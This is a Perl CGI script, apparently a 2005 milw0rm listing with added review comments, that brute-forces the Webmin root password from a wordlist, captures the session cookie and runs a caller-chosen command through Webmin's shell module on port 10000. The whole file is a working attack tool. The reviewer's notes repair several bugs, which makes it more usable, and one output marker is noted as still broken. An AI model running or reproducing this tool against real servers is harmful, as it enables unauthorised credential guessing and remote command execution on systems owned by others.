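#!/usr/bin/perl
#
# Webmin Web Brute Force v1.5 - CGI version (milw0rm listing, 2005-01-08).
#
# Attack tool, not a service. With atak=webmin it brute-forces the Webmin
# "root" account through session_login.cgi on port 10000 and, once the
# reply carries a session id (sid) cookie, runs one command through the
# Webmin shell module (/shell/index.cgi) with that cookie. All inputs come
# from the query string (atak, host, wlist, cmd) and are untrusted to
# whoever hosts this script. Use only against systems you are authorised
# to test.
#
# Review notes on this copy. The listing had been HTML-stripped and its
# lines collapsed; the code below restores the structure and fixes the
# defects that are visible in it:
#   - the wordlist was opened with 2-arg open on a raw CGI parameter, so a
#     caller could read any file the web server can read and, with a
#     trailing "|", run commands on the hosting server; now 3-arg read-only
#     open with an error check. It still reads whatever path the caller
#     names and echoes each line back ("Denenen sifre"), so restrict it to
#     a wordlist directory before exposing this script.
#   - "@wordlist=<data>" had its angle brackets stripped; restored as a
#     read from a lexical handle.
#   - the command request was written to the socket twice, so the target
#     executed the command twice over the keep-alive connection; sent once.
#   - Content-Length was patched in with s/__/.../ and s/siz/.../ over the
#     whole request, which also rewrote any "__" in the password or "siz"
#     in the command; lengths are now computed before the headers are built.
#   - wordlist entries kept their trailing newline and were interpolated
#     unencoded into the form body; now chomped and percent-encoded.
#   - $sock->close ran even when the connect had failed (undef invocant,
#     a fatal error); the close now sits in the success branch.
#   - "@012" and "@hotmail" in the banner interpolated as empty arrays and
#     ate the e-mail addresses; now escaped so the banner prints them.
#   - caller- and target-supplied strings echoed into the HTML page are
#     escaped.

use strict;
use warnings;
use CGI qw(:standard);
use IO::Socket;

# Webmin's default listening port; every request below goes there.
my $PORT = 10000;

$CGI::HEADERS_ONCE = 1;
my $q     = CGI->new;
my $atak  = cgi_value($q, "atak");
my $host  = cgi_value($q, "host");
my $wlist = cgi_value($q, "wlist");
my $cmd   = cgi_value($q, "cmd");

print $q->header(-type => 'text/html', -charset => 'windows-1254');
print qq~Webmin Web Brute Force v1.5 - cgi versiyon Webmin Web Brute Force v1.5 - cgi versiyon
Webmin BruteForce + Command execution- cgi version
v1.0:By Di42lo - DiAblo_2\@012.net.il
v1.5:By ZzagorR - zzagorrzzagorr\@hotmail.com - www.rootbinbash.com
~;

if ($atak eq "webmin") {
    # 3-arg, read-only open: a 2-arg open on a CGI value would let the
    # caller read arbitrary files or, via a trailing "|", run commands on
    # the server hosting this script. die() output lands in the web
    # server's error log, not in the page (same as the original's die calls).
    open(my $fh, '<', $wlist) or die "[-] Cannot open wordlist '$wlist': $!\n";
    my @wordlist = <$fh>;
    close $fh;
    chomp @wordlist;

    # Probe the target first so an unreachable host fails fast.
    my $probe = IO::Socket::INET->new(
        Proto => "tcp", PeerAddr => $host, PeerPort => $PORT, Timeout => 25,
    ) || die "[-] Webmin on this host does not exist\r\n";
    $probe->close;
    print "[+] BruteForcing...\n";

    my $sid;
    # The original walked the list from its last entry to its first; kept.
    PASSWORD: for my $pass (reverse @wordlist) {
        my $body = "page=%2F&user=root&pass=" . url_encode($pass);
        # Content-Length is computed from the body before the headers are
        # assembled, so no placeholder substitution can touch the password.
        my $request = join "",
            "POST /session_login.cgi HTTP/1.0\n",
            "Host: $host:$PORT\n",
            "Keep-Alive: 300\n",
            "Connection: keep-alive\n",
            "Referer: http://$host:$PORT/\n",
            "Cookie: testing=1\n",
            "Content-Type: application/x-www-form-urlencoded\n",
            "Content-Length: " . length($body) . "\n",
            "\n",
            $body, "\n\n";

        my $sock = IO::Socket::INET->new(
            Proto => "tcp", PeerAddr => $host, PeerPort => $PORT, Timeout => 25,
        );
        # A failed connect skips this entry instead of dying on an undef close.
        next PASSWORD unless $sock;
        print "[+] Denenen sifre: " . html_escape($pass) . "\n";
        print $sock $request;
        # A sid cookie in the reply is the success signal; the reply is read
        # to EOF either way, as the original did.
        while (my $answer = <$sock>) {
            if ($answer =~ /sid=(.*);/) {
                $sid = $1;
                print "[+] Found SID : " . html_escape($sid) . "\n";
                print "[+] Sifre : " . html_escape($pass) . "\n";
            }
        }
        $sock->close;
        last PASSWORD if defined $sid;
    }
    # Wordlist exhausted without a hit: the original exited here as well.
    exit unless defined $sid;

    print "[+] Connecting to host once again\n";
    my $sock = IO::Socket::INET->new(
        Proto => "tcp", PeerAddr => $host, PeerPort => $PORT, Timeout => 10,
    ) || die "[-] Cant Connect once again for command execution\n";
    print "[+] Connected.. Sending Buffer\n";

    # Multipart body for Webmin's shell module. The boundary string and the
    # five fields (cmd, pwd, history, previous, pcmd) are those the original
    # sent; body delimiters are "--" plus the header boundary.
    my $boundary = "---------------------------19777347561180971495777867604";
    my @fields = (
        [cmd      => $cmd],
        [pwd      => "/root"],
        [history  => ""],
        [previous => $cmd],
        [pcmd     => $cmd],
    );
    my $form = "";
    for my $field (@fields) {
        $form .= "--$boundary\n"
               . "Content-Disposition: form-data; name=\"$field->[0]\"\n"
               . "\n"
               . "$field->[1]\n";
    }
    $form .= "--$boundary--\n\n";

    my $request = join "",
        "POST /shell/index.cgi HTTP/1.1\n",
        "Host: $host:$PORT\n",
        "Keep-Alive: 300\n",
        "Connection: keep-alive\n",
        "Referer: http://$host:$PORT/shell/\n",
        "Cookie: sid=$sid; testing=1; x\n",
        "Content-Type: multipart/form-data; boundary=$boundary\n",
        "Content-Length: " . length($form) . "\n",
        "\n",
        $form;
    # Sent exactly once; the original wrote the buffer twice.
    print $sock $request;
    print "[+] Buffer sent...running command " . html_escape($cmd) . "\n";

    my $in_output = 0;
    while (my $answer = <$sock>) {
        # Webmin puts a short status message into window.defaultStatus.
        if ($answer =~ /defaultStatus="(.*)";/) {
            print $1 . "\n";
        }
        # NOTE(review): this start marker is damaged in the listing. The tag
        # that opened the command-output block was removed when the HTML was
        # stripped, leaving only a newline followed by ">", which a line read
        # by <$sock> cannot match, so no output is ever printed. Presumably it
        # was the <pre> that pairs with the </pre></td></tr> end marker below;
        # restore it from an original copy before use.
        if ($answer =~ /\n>/) {
            $in_output = 1;
        }
        if ($in_output) {
            # End of the output block: the original exited without closing.
            exit if $answer =~ m{</pre></td></tr>};
            print $answer;
        }
    }
    $sock->close;
}

# Return the named CGI parameter, or "" when it is absent.
sub cgi_value {
    my ($cgi, $name) = @_;
    my $value = $cgi->param($name);
    return defined $value ? $value : '';
}

# Percent-encode a form value (unreserved characters left as-is).
sub url_encode {
    my ($value) = @_;
    $value =~ s/([^A-Za-z0-9_.~-])/sprintf('%%%02X', ord $1)/ge;
    return $value;
}

# Escape a string for inclusion in the HTML response.
sub html_escape {
    my ($value) = @_;
    $value = '' unless defined $value;
    $value =~ s/&/&amp;/g;
    $value =~ s/</&lt;/g;
    $value =~ s/>/&gt;/g;
    $value =~ s/"/&quot;/g;
    return $value;
}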

# With no "atak" parameter the script only shows its usage text. The form
# markup was lost when this listing was HTML-stripped; what is left are the
# field labels and the example wordlist entries, printed verbatim.
unless (length $atak) {
    print qq~
Webmin Web Brute Force v1.5 - cgi version
Server:
Wordlist:Examples:
---------
admin
administrator
redhat
mandrake
suse
Cmd:
~;
}
# milw0rm.com [2005-01-08]